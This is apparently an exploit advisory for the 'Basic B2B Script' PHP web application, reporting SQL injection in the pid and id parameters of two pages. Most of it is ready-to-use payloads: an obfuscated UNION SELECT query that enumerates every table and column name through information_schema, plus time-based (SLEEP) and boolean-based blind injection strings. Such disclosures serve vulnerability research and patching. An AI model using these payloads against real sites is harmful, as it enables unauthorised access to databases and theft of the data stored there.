Basic B2B Script – SQL Injection
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/product_view1.php?pid=[SQL] -19'++/*!03333UNION*/+/*!03333SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+- http://localhost/[PATH]/productcompanyinfo.php?id=[SQL] Parameter: pid (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=19' AND SLEEP(5) AND 'zgOs'='zgOs Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=309' AND 2824=2824 AND 'AWCd'='AWCd Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=309' AND SLEEP(5) AND 'BTCw'='BTCw